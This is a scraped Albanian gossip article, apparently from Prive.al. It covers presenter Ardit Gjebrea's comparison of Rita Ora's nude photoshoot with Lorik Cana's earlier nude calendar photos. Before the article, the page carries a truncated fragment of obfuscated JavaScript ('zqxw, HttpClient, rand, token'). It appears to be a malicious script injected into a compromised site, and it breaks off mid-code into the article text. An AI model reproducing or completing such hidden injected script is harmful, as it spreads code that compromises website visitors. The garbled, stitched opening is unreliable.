;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ardit Gjebrea krahason Rita Orën dhe Lorik Canën

By

Seti i fundit fotografik i Rita Orës ku shfaqej nudo nuk kishte se si të kalonte pa komente.

Ajo që ra në sy ishte fakti se edhe mediat prestigjioze ndërkombëtare rezervuan kritika të ashpëra për këtë veprim të Ritës nën pretekstin se zhveshja e saj nuk shërbeu për ndonjë kauzë të caktuar.

Komentin e tij në një formë për këtë zhvillim e ka dhënë edhe prezantuesi i njohur Ardit Gjebrea. Ai ka tërhequr paralele mes Ritës dhe Lorik Canës duke thënë se të dy janë shqiptarë, të dy të famshëm e të dy diametralisht të kundërt.

Por nëse i referohemi krahasimit për lakuriqësinë për të cilin me gjasë prezantuesi ka cilësuar dyshen si pole të kundërta, ky konstantim nuk qëndron.

Me gjasë, Gjebra nuk është i njoftuar se nëpër pozime nudo, Lorik Cana ka kaluar para më shumë se një dekade, madje edhe ai në Francë për kalendarin Dieux du Stade.

Atëbotë sikurse edhe sot, femrat çmendeshin për Lorikun e pashëm që pati ‘rrezikuar’ të realizojë foto nudo, kur një gjë e tillë as që kalohej nëpër mendje.

Çështja është se a do ndjekë Rita shembullin e Lorikut, duke përmbyllur këtë kaptinë në mes të 20-tave. Kjo mbetet të dëshmohet nga koha … /Prive.al/

vesa

Screenshot_2016-02-02-11-25-35

Artikuj të ngjashëm